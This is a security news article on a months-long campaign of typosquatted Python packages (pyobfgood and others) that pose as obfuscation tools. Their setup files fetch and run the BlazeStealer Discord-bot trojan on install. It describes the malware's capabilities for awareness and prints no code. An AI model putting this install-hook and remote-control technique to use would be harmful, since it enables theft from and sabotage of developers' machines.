Threat actor targets developers with malicious Python packages
New research by Checkmarx has unveiled a threat actor who has been injecting malicious Python packages into the open-source repository for approximately six months.
Open-source tools and packages serve an essential role in streamlining tasks and boosting development processes in the realm of software development. However, as the community expands, the number of malevolent actors looking to exploit it also increases. An illustration of this is developers being targeted by seemingly legitimate Python obfuscation packages laced with harmful code.
Throughout 2023, attackers distributed harmful Python packages masked as genuine obfuscation tools, activating malicious payloads upon installation. Deceptively labelled as "BlazeStealer", these payloads retrieve an additional malicious script from an external source which facilitates a Discord bot.
Consequently, attackers gain complete control over the victim's computer. Developers engaged in code obfuscation are likely working with valuable and sensitive information, making them valuable targets and thus, probable victims of this assault.
To this effect, numerous packages with names beginning with pyobf, like pyobftoexe, pyobfusfile, pyobfexecute, and most recently, pyobfgood, were rolled out. These packages, disguised as useful tools for Python code obfuscation, carry concealed intentions.
Notably, the attackers strategically chose these names to imitate authentic packages, such as pyobf2 and pyobfuscator, utilised by developers for obfuscating their Python code.
The most recent, a package called pyobfgood was published in late October of 2023, and ushered in a devastating payload. The setup.py and init.py files of the package comprise a script that becomes active upon package installation, receiving and executing code fetched from an external source.
This malware, aptly titled BlazeStealer, operates a Discord bot with a unique identifier. Functionally, it provides attackers with full access to the victim's system, facilitating harmful actions such as exfiltrating detailed host information, stealing Chrome web browser passwords, establishing keyloggers, downloading files, capturing screenshots, and more menacingly, rendering the computer inoperative. The bot can even deactivate Windows Defender and Task Manager, and run any command on the compromised host.
Peculiarly, the Discord bot contains a specific command that can control the computer's camera. By stealthily downloading a zip file from a remote server, extracting its contents, and running a programme called WebCamImageSave.exe, the bot is able to secretly capture a photo using the webcam. The resulting image is discreetly sent back to the Discord channel, leaving no trace of its presence after deleting the downloaded files.
The audacity of the attackers becomes starkly evident through the bot's malicious 'humour'. It sends messages ridiculing the imminent destruction of the compromised machine, displaying phrases such as "Your computer is going to start burning, good luck. :)" and "Your computer is going to die now, good luck getting it back :)" towards its victims.
The attackers are specifically targeting developers involved in code obfuscation. As these individuals are likely handling valuable and sensitive information, they present attractive targets to hackers.
Checkmarx states, developers must remain vigilant and thoroughly vet packages before employing them. As part of their Supply Chain Security solution, Checkmarx's research team consistently monitors suspicious activities in the open-source software ecosystem, tracking and flagging signals that may imply foul play and promptly alerting their customers to help safeguard them.